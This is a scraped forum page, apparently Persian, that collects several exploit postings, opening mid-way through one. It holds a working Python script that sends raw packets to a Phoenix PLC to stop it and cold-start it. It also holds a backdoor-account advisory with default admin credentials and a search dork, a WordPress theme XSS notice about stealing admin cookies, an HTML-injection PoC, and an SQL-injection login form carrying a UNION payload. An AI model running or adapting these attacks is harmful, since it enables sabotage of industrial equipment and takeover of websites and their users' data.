send_and_recv(s,1000,'010000000000300000000000000000004164652e52656d6f74696e672e53657276696365732e4953696d706c6546696c65416363657373536572766963653200') send_and_recv(s,1000,'0100020000000e0003000300000000000500000012401340130011401200') return def is_ipv4(ip): match = re.match("^(\d{0,3})\.(\d{0,3})\.(\d{0,3})\.(\d{0,3})$", ip) if not match: return False quad = [] for number in match.groups(): quad.append(int(number)) if quad[0] < 1: return False for number in quad: if number > 255 or number < 0: return False return True ##### The Actual Program if not len(sys.argv) == 2: IP = raw_input("Please enter the IPv4 address of the Phoenix PLC: ") else: IP = sys.argv[1] if not is_ipv4(IP): print "Please go read RFC 791 and then use a legitimate IPv4 address." sys.exit() ## - initialization, this will get the PLC type, Firmware version, build date & time s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,infoport)) print 'Initializing PLC' print '----------------' code = send_and_recv(s,1000,'0101001a005e000000000003000c494245544830314e305f4d00').encode('hex')[34:36] send_and_recv(s,1000,'01050016005f000008ef00' + code + '00000022000402950000') ret = send_and_recv(s,1000,'0106000e00610000881100' + code + '0400') print 'PLC Type = ' + ret[30:50] print 'Firmware = ' + ret[66:70] print 'Build = ' + ret[79:100] send_and_recv(s,1000,'0105002e00630000000000' + code + '00000023001c02b0000c0000055b4433325d0b466c617368436865636b3101310000') send_and_recv(s,1000,'0106000e0065ffffff0f00' + code + '0400') send_and_recv(s,1000,'010500160067000008ef00' + code + '00000024000402950000') send_and_recv(s,1000,'0106000e0069ffffff0f00' + code + '0400') send_and_recv(s,1000,'0102000c006bffffff0f00' + code) s.shutdown(socket.SHUT_RDWR) s.close() print 'Initialization done' print '-------------------\r\n' print 'Will now print the PLC state and reverse it after 3 seconds' raw_input('Press [Enter] to continue') ########## CONTROL PHASE ####### Start monitoring with loop on port 41100 s = socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect((IP,controlport)) # First init phase (sending things like 'Ade.Remoting.Services.IProConOSControlService2' and 'Ade.Remoting.Services.ISimpleFileAccessService3', 21 packets) initMonitor(s) # Query packet packet1 = '010002000000080003000300000000000200000002400b40' # Keepalive packet packet2 = '0100020000001c0003000300000000000c00000007000500060008001000020011000e000f000d0016401600' ## The loop keepalive and query status loop (2 x keepalive, one time query): i = 0 state = 'On' running = 0 stopme = 0 startme = 0 while True: i += 1 time.sleep(0.1) ## Keep Alive send_and_recv(s,1000,packet2) send_and_recv(s,1000,packet2) ## Possible actions (like stop/start) should be sent now before the query state if (state == 'Running' and stopme): print 'Sending Stop' doAction(s,'01000200000000000100070000000000') startme = stopme = 0 elif (state == 'Stop' and startme): print 'Sending COLD Start' ## This is the COLD start: doAction(s,'010002000000020001000600000000000100') ## This is the WARM start: doAction(s,'010002000000020001000600000000000200') ## This is the HOT start: doAction(s,'010002000000020001000600000000000300') doAction(s,'010002000000020001000600000000000100') startme = stopme = 0 ## Query Status ret = send_and_recv(s,1000,packet1).encode('hex') if ret[48:50] == '03': state = 'Running' elif ret[48:50] == '07': state = 'Stop' elif ret[48:50] == '00': state = 'On' else: print 'State unknown, found code: '+ret.encode('hex')[48:50] print 'Current PLC state: '+state ## Maintaining the LOOP if i == 50: break # ''' if i == 30: if state == 'Running': stopme = 1 else: startme = 1 #''' raw_input('All done, press [Enter] to exit')
  21. ====================================================================================================================================== | # Title : MenorahMarket - Multi Vendor Digital Goods Market Place Script V 2.0 Backdoor Account Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) | | # Vendor : https://codecanyon.net/item/menorahmarket-multi-vendor-digital-goods-market-place-script/20195267 | | # Dork : "COPYRIGHTS 2017 ALL RIGHTS RESERVED BY - EDD MARKET PLACE" | ====================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine . [+] Use Admin : Owner: owner@owner.com / password Admin : admin@admin.com / password Executive : executive@executive.com / password Vendor : vendor@vendor.com / password Customer : user@user.com / password [+] Panel http://getup.market/home Greetings to :========================================================================================================================= | jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh | | =======================================================================================================================================
  22. حفره Cross Site Script در پوسته پیشفرض Twenty Fifteen وردپرس DOM XSS Vulnerability in Twenty Fifteen WordPress Theme حفره Cross Site Script در یکی از پوسته های وردپرس که به صورت پیشفرض در تمامی سایت های وردپرسی نصب میباشد کشف شده است پوسته Twenty Fifteen ورژن 4.2.1 دارای باگ Xss میباشد که با این حفره میتوان اقدام به سرقت کوکی مدیر سایت نمود و کنترل سایت وردپرسی را در اختیار گرفت. حفره در قسمت wp-content/themes/twentyfifteen/genericons/
  23. Snapshot ~ HTML5 , CSS3 , JS Demo : http://demo.moeein.ir/SnappHost-snapshot/ Download link : SnappHost-snapshot.zip - آپلود عکس و فایل رایگان
  24. # # # # # # Exploit Title: Readymade Video Sharing Script 3.2 - HTML Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: https://www.phpscriptsmall.com/ # Software Link: https://www.phpscriptsmall.com/product/php-video-sharing-script/ # Demo: http://www.smsemailmarketing.in/demo/videosharing/ # Version: 3.2 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17649 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability implication allows an attacker to inject html code .... # # Proof of Concept: # # 1) # http://localhost/[PATH]/single-video-detail.php?video_id=MTMy&comment=[CODE]&comment_submit= # # # # # # #
  25. <!-- # # # # # # Exploit Title: Bus Booking Script 1.0 - SQL Injection # Dork: N/A # Date: 13.12.2017 # Vendor Homepage: http://www.phpautoclassifiedscript.com/ # Software Link: http://www.phpautoclassifiedscript.com/bus-booking-script.html # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2017-17645 # # # # # # Exploit Author: Ihsan Sencan # Author Web: http://ihsan.net # Author Social: @ihsansencan # # # # # # Description: # The vulnerability allows an attacker to inject sql commands.... # # Proof of Concept: --> <html> <body> <form action="http://localhost/newbusbooking/admin/index.php" method="post" enctype="application/x-www-form-urlencoded" name="frmlogin" target="_self"> <input name="txtname" type="text" value="' UNION ALL SELECT 0x31,0x564552204159415249,0x33,0x34,0x35-- Ver Ayari"></div> <input name="logbut" id="logbut" type="submit"></div> </form> </body> </html>
×
×
  • جدید...